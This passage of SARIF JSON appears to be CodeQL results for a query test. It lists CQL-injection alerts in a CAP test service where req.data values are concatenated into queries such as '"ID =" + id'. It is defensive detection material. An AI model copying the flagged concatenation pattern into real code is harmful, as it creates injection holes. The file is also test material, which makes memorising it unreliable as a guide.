id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":514,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":514,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":516,"startColumn":41,"endColumn":63}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":516,"startColumn":71,"endColumn":85}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":537,"startColumn":9,"endColumn":55}}}],"partialFingerprints":{"primaryLocationLineHash":"d38ceeef8a2ac936:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":535,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":535,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":535,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":537,"startColumn":52,"endColumn":54}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":537,"startColumn":43,"endColumn":54}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":535,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":535,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":537,"startColumn":43,"endColumn":54}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":546,"startColumn":16,"endColumn":21}}}],"partialFingerprints":{"primaryLocationLineHash":"e46cd48130ebf859:1","primaryLocationStartColumnFingerprint":"7"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":543,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":543,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":543,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":544,"startColumn":56,"endColumn":58}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":544,"startColumn":48,"endColumn":58}},"message":{"text":"\"ID=\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":544,"startColumn":21,"endColumn":59}},"message":{"text":"SELECT. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":544,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":546,"startColumn":16,"endColumn":21}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":543,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":543,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":553,"startColumn":9,"endColumn":46}}}],"partialFingerprints":{"primaryLocationLineHash":"ecbeb50b953c6892:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":551,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":551,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":551,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":553,"startColumn":43,"endColumn":45}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":553,"startColumn":34,"endColumn":45}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":551,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":551,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":553,"startColumn":34,"endColumn":45}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":567,"startColumn":9,"endColumn":79}}}],"partialFingerprints":{"primaryLocationLineHash":"558b998facd3da37:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":565,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":565,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":565,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":567,"startColumn":50,"endColumn":56}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":567,"startColumn":34,"endColumn":56}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":565,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":565,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":565,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":567,"startColumn":76,"endColumn":78}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":567,"startColumn":64,"endColumn":78}},"message":{"text":"\"col1 = \" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":565,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":565,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":567,"startColumn":34,"endColumn":56}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":567,"startColumn":64,"endColumn":78}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":588,"startColumn":9,"endColumn":48}}}],"partialFingerprints":{"primaryLocationLineHash":"91becd2fa07cdcc9:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":586,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":586,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":586,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":588,"startColumn":45,"endColumn":47}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":588,"startColumn":36,"endColumn":47}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":586,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":586,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":588,"startColumn":36,"endColumn":47}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":597,"startColumn":16,"endColumn":21}}}],"partialFingerprints":{"primaryLocationLineHash":"fb574234cc9e3952:1","primaryLocationStartColumnFingerprint":"7"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":594,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":594,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":594,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":595,"startColumn":56,"endColumn":58}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":595,"startColumn":48,"endColumn":58}},"message":{"text":"\"ID=\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":595,"startColumn":21,"endColumn":59}},"message":{"text":"SELECT. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":595,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":597,"startColumn":16,"endColumn":21}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":594,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":594,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":604,"startColumn":9,"endColumn":46}}}],"partialFingerprints":{"primaryLocationLineHash":"ecbeb50b995e8367:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":602,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":602,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":602,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":604,"startColumn":43,"endColumn":45}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":604,"startColumn":34,"endColumn":45}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":602,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":602,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":604,"startColumn":34,"endColumn":45}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":618,"startColumn":9,"endColumn":79}}}],"partialFingerprints":{"primaryLocationLineHash":"558b998facd3da37:2","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":616,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":616,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":616,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":618,"startColumn":50,"endColumn":56}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":618,"startColumn":34,"endColumn":56}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":616,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":616,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":616,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":618,"startColumn":76,"endColumn":78}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":618,"startColumn":64,"endColumn":78}},"message":{"text":"\"col1 = \" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":616,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":616,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":618,"startColumn":34,"endColumn":56}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":618,"startColumn":64,"endColumn":78}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":639,"startColumn":9,"endColumn":48}}}],"partialFingerprints":{"primaryLocationLineHash":"91becd2fa09975ba:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":637,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":637,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":637,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":639,"startColumn":45,"endColumn":47}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":639,"startColumn":36,"endColumn":47}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":637,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":637,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":639,"startColumn":36,"endColumn":47}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":647,"startColumn":18,"endColumn":23}}}],"partialFingerprints":{"primaryLocationLineHash":"1e42917dcc40a599:1","primaryLocationStartColumnFingerprint":"11"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":645,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":645,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":645,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":646,"startColumn":56,"endColumn":58}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":646,"startColumn":48,"endColumn":58}},"message":{"text":"\"ID=\" + 